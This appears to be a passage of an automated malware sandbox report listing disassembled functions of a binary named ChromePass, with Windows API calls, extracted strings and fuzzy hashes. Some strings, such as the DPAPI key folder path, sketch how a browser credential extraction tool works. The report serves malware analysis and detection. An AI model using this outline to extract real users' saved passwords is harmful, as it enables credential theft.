                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: c369cc2eda86e2299338a834ecd43e7d198953d8cec81144db89381f78cfc048
                                        • Instruction ID: 55441b7852df1a309b124f95804d97ee0adb4dd075dc708f7d4400b2906616ed
                                        • Opcode Fuzzy Hash: c369cc2eda86e2299338a834ecd43e7d198953d8cec81144db89381f78cfc048
                                        • Instruction Fuzzy Hash: 31415171D00219AFDB209F95CC85DAFBBB9FF84704F0080AAF914B62A1D7759A41CF64
                                        Function 00406218 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadMenuW.USER32(?,?), ref: 0040623E
                                          • Part of subcall function 00406068: GetMenuItemCount.USER32(?), ref: 0040607E
                                          • Part of subcall function 00406068: memset.MSVCRT ref: 0040609D
                                          • Part of subcall function 00406068: GetMenuItemInfoW.USER32 ref: 004060D9
                                          • Part of subcall function 00406068: wcschr.MSVCRT ref: 004060F1
                                        • DestroyMenu.USER32(00000000), ref: 0040625C
                                        • CreateDialogParamW.USER32(?,?,00000000,00406213,00000000), ref: 004062AB
                                        • memset.MSVCRT ref: 004062C7
                                        • GetWindowTextW.USER32(00000000,?,00001000), ref: 004062DC
                                          • Part of subcall function 00405E9F: _snwprintf.MSVCRT ref: 00405EC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountCreateDestroyDialogInfoLoadParamTextWindow_snwprintfwcschr
                                        • String ID: caption
                                        • API String ID: 4269739968-4135340389
                                        • Opcode ID: 2e7af70ece1155b5e30b8fa81bec0d763625027daf0eb4b5469ea317d236c9cf
                                        • Instruction ID: fa52d7f1b1008cc69c615fc7342edfa9e29d8fd1c7b162c5b6278b3a8d89fcb7
                                        • Opcode Fuzzy Hash: 2e7af70ece1155b5e30b8fa81bec0d763625027daf0eb4b5469ea317d236c9cf
                                        • Instruction Fuzzy Hash: 0921C732500214EFEB21AF51EC89EAF3B65EF45710F41007AFA06A51D1DB789961CFAD
                                        Function 00406068 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                        • String ID: 0$6
                                        • API String ID: 2029023288-3849865405
                                        • Opcode ID: edc64a08c20b33aba1040eafddddcfefcd0923b02e7d2eb590546dcc5dc052ce
                                        • Instruction ID: 16cb55e7f91040512dc75ba1883eca596ef12c0a57738a0f4195a451921f21b5
                                        • Opcode Fuzzy Hash: edc64a08c20b33aba1040eafddddcfefcd0923b02e7d2eb590546dcc5dc052ce
                                        • Instruction Fuzzy Hash: 7321FE32504350ABC720CF55D885A9FB7E9FF84754F410A3FFA45A6281E7368A20CB9A
                                        Function 004029AD Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004027EF: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00402C8F,?,00403271,00000414,?,?,?,?,?,?,?), ref: 004027FF
                                        • memset.MSVCRT ref: 004029E2
                                        • memset.MSVCRT ref: 004029F6
                                        • memset.MSVCRT ref: 00402A0A
                                        • memcpy.MSVCRT(?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,00000414), ref: 00402A1A
                                        • memcpy.MSVCRT(?,?,00000014,?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 00402A2A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$memcpy$AcquireContextCrypt
                                        • String ID: 6$\
                                        • API String ID: 208668350-1284684873
                                        • Opcode ID: 4ae6d09cf5ac4c9f5680b025e46bddb1b0075f4aaf80fe0043221d37ad413e65
                                        • Instruction ID: 0f4ecce006b6259caa9f2005d481d0c0c5787f0323d74ee6d6910b3726bfe70b
                                        • Opcode Fuzzy Hash: 4ae6d09cf5ac4c9f5680b025e46bddb1b0075f4aaf80fe0043221d37ad413e65
                                        • Instruction Fuzzy Hash: 1D219F7250012EAEDB22EE54DC85FEF3BADBF09304F0040BAB908E2042D6789A548F65
                                        Function 00405000 Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040501E
                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080,?,?), ref: 0040504C
                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080,?,?), ref: 00405061
                                        • wcscpy.MSVCRT ref: 00405071
                                        • wcscat.MSVCRT ref: 0040507E
                                        • wcscat.MSVCRT ref: 0040508D
                                        • wcscpy.MSVCRT ref: 004050A1
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                        • String ID:
                                        • API String ID: 1331804452-0
                                        • Opcode ID: bcf1390ad7f74156ae8b04afdeb0b4738fb1043f16cbd9194c0ece294b357243
                                        • Instruction ID: 355817c143a24c0a41ac53ccef820e561d99b574c250e2a2da21fdf295fd440c
                                        • Opcode Fuzzy Hash: bcf1390ad7f74156ae8b04afdeb0b4738fb1043f16cbd9194c0ece294b357243
                                        • Instruction Fuzzy Hash: DF11B6B2900128BFDB21AB50EC85EFF777CEB04304F44487BBA05A2051D2B899958EA9
                                        Function 00405110 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset
                                        • String ID: %2.2X
                                        • API String ID: 2521778956-791839006
                                        • Opcode ID: 00ee19d816f89cf8b905fb19bc228da781efd16ecb144870987b18c8766899a3
                                        • Instruction ID: 60f4b69dee50b3d091ac869881a6f292a5657bc2eb947e70e2e40d8e8ac2718b
                                        • Opcode Fuzzy Hash: 00ee19d816f89cf8b905fb19bc228da781efd16ecb144870987b18c8766899a3
                                        • Instruction Fuzzy Hash: 0901F572F003346AE7216615BC86BBB33A9EB44715F90006BFC14AA1C2E67CE9454ACA
                                        Function 0040413F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 27libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003F3), ref: 00404151
                                        • LoadLibraryW.KERNEL32(shlwapi.dll), ref: 0040415E
                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040416C
                                        • FreeLibrary.KERNEL32(00000000), ref: 0040417F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeItemLoadProc
                                        • String ID: SHAutoComplete$shlwapi.dll
                                        • API String ID: 963042594-1506664499
                                        • Opcode ID: cc1d2221f923288e56d1d85c3232f4a7380646f269b1f931d5630d8c804f0511
                                        • Instruction ID: 01acf26635d1cfce3d283dedcdd8a10d45ef81041fc001994a40c011f36b91fa
                                        • Opcode Fuzzy Hash: cc1d2221f923288e56d1d85c3232f4a7380646f269b1f931d5630d8c804f0511
                                        • Instruction Fuzzy Hash: 37E048717002317BD6212771ACCDD7F766DDF917957500437BA02E51B1CFB889928A18
                                        Function 0042A9EA Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 112stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • BINARY, xrefs: 0042A9F9
                                        • unknown encoding, xrefs: 0042AA07
                                        • Unable to delete/modify collation sequence due to active statements, xrefs: 0042AA50
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID: BINARY$Unable to delete/modify collation sequence due to active statements$unknown encoding
                                        • API String ID: 39653677-1766853119
                                        • Opcode ID: b7cffcdca24aecc4cd8aff73aa3209c3958a0fa5c1dff23795c8e3a2643926a5
                                        • Instruction ID: 0f18042846b3076d369a411df17496327afcce51f7d4b400c808bb306dccc812
                                        • Opcode Fuzzy Hash: b7cffcdca24aecc4cd8aff73aa3209c3958a0fa5c1dff23795c8e3a2643926a5
                                        • Instruction Fuzzy Hash: 8A315971300220AFDB255F29EC42BABBBA5DF00324F64851BFC149A282D779DD91C699
                                        Function 0040C1F7 Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: isdigit
                                        • String ID:
                                        • API String ID: 2326231117-0
                                        • Opcode ID: 1901b69677519f67451912c9592368bc0ad4f5fb940677d5fde9bea6b71fae16
                                        • Instruction ID: 83484cbb7398d2c2382e148c4f8f7a896e897c15591de59ac67ee15c4c6b4b55
                                        • Opcode Fuzzy Hash: 1901b69677519f67451912c9592368bc0ad4f5fb940677d5fde9bea6b71fae16
                                        • Instruction Fuzzy Hash: 6B21B162D482A19AEF3017F618803326BC84F76351F190AFFECD0E2A81E17C88C2165A
                                        Function 00408996 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004089B8
                                          • Part of subcall function 004059FD: GetModuleHandleW.KERNEL32(00000000,?,?,00401F52,?,?), ref: 00405A3C
                                          • Part of subcall function 004059FD: LoadStringW.USER32(00000000,00000519,00000FFF), ref: 00405AD5
                                          • Part of subcall function 004059FD: memcpy.MSVCRT(00000000,00000002,?,?,00401F52,?,?), ref: 00405B15
                                          • Part of subcall function 004059FD: wcscpy.MSVCRT ref: 00405A7E
                                          • Part of subcall function 004059FD: wcslen.MSVCRT ref: 00405A9C
                                          • Part of subcall function 004059FD: GetModuleHandleW.KERNEL32(00000000), ref: 00405AAA
                                          • Part of subcall function 00405365: memset.MSVCRT ref: 00405386
                                          • Part of subcall function 00405365: _snwprintf.MSVCRT ref: 004053B4
                                          • Part of subcall function 00405365: wcslen.MSVCRT ref: 004053C0
                                          • Part of subcall function 00405365: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 004053D8
                                          • Part of subcall function 00405365: wcslen.MSVCRT ref: 004053E6
                                          • Part of subcall function 00405365: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 004053F9
                                          • Part of subcall function 004051AA: wcscpy.MSVCRT ref: 00405210
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 2618321458-3614832568
                                        • Opcode ID: 24c53f0340c22b77f7c47b08a15643e9465d2a9af67130d0efdf346d2cfa2e93
                                        • Instruction ID: 84affe95b08b9f600584db437cc8fe7d90b315df240b41990a1c8402c074e1b9
                                        • Opcode Fuzzy Hash: 24c53f0340c22b77f7c47b08a15643e9465d2a9af67130d0efdf346d2cfa2e93
                                        • Instruction Fuzzy Hash: 23212DB1D00759DBCB50DF99D881ADE7BB4FB04318F10417AE558B7241EB385A46CF98
                                        Function 00402812 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: wcslen$wcscatwcscpy
                                        • String ID: AppData\Roaming\Microsoft\Protect$Application Data\Microsoft\Protect
                                        • API String ID: 295340062-36309976
                                        • Opcode ID: 9895488412633ed806c8772db13f093fd39d97af3cb3ae421cc36ee4f8e35c0e
                                        • Instruction ID: 2ef22bdbafb1d8894d50f593b003672d9059eec5658b22f5f0426db89dd930ae
                                        • Opcode Fuzzy Hash: 9895488412633ed806c8772db13f093fd39d97af3cb3ae421cc36ee4f8e35c0e
                                        • Instruction Fuzzy Hash: 3F012BB33042142AD3107B26ADC5AA973D9DF81726B60057FFD40E60C2EFBDA941815D
                                        Function 00407874 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404870: wcslen.MSVCRT ref: 0040487D
                                          • Part of subcall function 00404870: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040788B,?,<item>), ref: 0040488C
                                        • memset.MSVCRT ref: 004078AB
                                          • Part of subcall function 0040AAE5: memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,004078CC,?,?), ref: 0040AB62
                                          • Part of subcall function 00407185: wcscpy.MSVCRT ref: 0040718A
                                          • Part of subcall function 00407185: _wcslwr.MSVCRT ref: 004071AB
                                        • _snwprintf.MSVCRT ref: 004078F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 2236007434-2769808009
                                        • Opcode ID: d440415f155090d75d789f600a398a7556cb988a9e158da0a98f77aa85ee3b2c
                                        • Instruction ID: e095093e16e3ceeaa7e9ea9200a2abc427f8573690bfedeb410235e0cb9c8907
                                        • Opcode Fuzzy Hash: d440415f155090d75d789f600a398a7556cb988a9e158da0a98f77aa85ee3b2c
                                        • Instruction Fuzzy Hash: 0111BF32A00715BFDB10AF61EC82E9A7B66FF04318F10402AF904265A2C739F960CBC8
                                        Function 00407A4F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00407A73
                                        • memset.MSVCRT ref: 00407A8A
                                          • Part of subcall function 00404870: wcslen.MSVCRT ref: 0040487D
                                          • Part of subcall function 00404870: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040788B,?,<item>), ref: 0040488C
                                          • Part of subcall function 00407185: wcscpy.MSVCRT ref: 0040718A
                                          • Part of subcall function 00407185: _wcslwr.MSVCRT ref: 004071AB
                                        • _snwprintf.MSVCRT ref: 00407AC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: <%s>$<?xml version="1.0" ?>
                                        • API String ID: 168708657-3296998653
                                        • Opcode ID: dc248ede9b9b93bc8a09d13e098aaa581637d56c3575a5626b05814e7271e46a
                                        • Instruction ID: a7dd0036f4669b490196cfc870af23aad45e3806ab696487d408a2c478166364
                                        • Opcode Fuzzy Hash: dc248ede9b9b93bc8a09d13e098aaa581637d56c3575a5626b05814e7271e46a
                                        • Instruction Fuzzy Hash: C201D8B2E0012967D720A751DC46FEA766EEF40308F4000B67F08B6091D778DA558698
                                        Function 004048B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ErrorLastMessage_snwprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 313946961-1552265934
                                        • Opcode ID: dff395dbf71922a9d6890ca3d12c6ce5f466b0e16580e663594afad01ea92c52
                                        • Instruction ID: a06d71eb03b053c5f46cc024e6edb27df811283a0976cd713272c2079fcf5c70
                                        • Opcode Fuzzy Hash: dff395dbf71922a9d6890ca3d12c6ce5f466b0e16580e663594afad01ea92c52
                                        • Instruction Fuzzy Hash: 1BF0AEB664021867CB11A794DC46FDE73ACFB44785F5400A7BA04B3141DBB49A454AB9
                                        Function 0040D0AF Relevance: 7.6, APIs: 5, Instructions: 105filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LockFile.KERNEL32(00000000,40000000,00000000,00000001,00000000), ref: 0040D101
                                        • Sleep.KERNEL32(00000001), ref: 0040D10B
                                        • LockFile.KERNEL32(00000000,40000001,00000000,00000001,00000000), ref: 0040D14D
                                        • LockFile.KERNEL32(00000000,40000002,00000000,000001FE,00000000), ref: 0040D187
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: FileLock$Sleep
                                        • String ID:
                                        • API String ID: 2837005644-0
                                        • Opcode ID: 59e48f5a8ecbc93c10ecf98034fdb6630a6d4af4ba3888f978c1a95b5dc2fc7b
                                        • Instruction ID: 71930969913137a4b18d29947e3b921dae6dfd5bf9e445a70e1e275211a53b2c
                                        • Opcode Fuzzy Hash: 59e48f5a8ecbc93c10ecf98034fdb6630a6d4af4ba3888f978c1a95b5dc2fc7b
                                        • Instruction Fuzzy Hash: 6931C731900304BADB314F95CD41BABB7A2AF80758F24C03AF9197E2C5CB79D9499B18
                                        Function 0040915D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040919C
                                          • Part of subcall function 004050AE: ShellExecuteW.SHELL32(?,open,?,0042C47C,0042C47C,00000005), ref: 004050C4
                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004091E0
                                        • GetMenuStringW.USER32(?,?,?,0000004F,00000000), ref: 004091FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ExecuteMenuMessageSendShellStringmemset
                                        • String ID: hAC
                                        • API String ID: 3150464542-3207736804
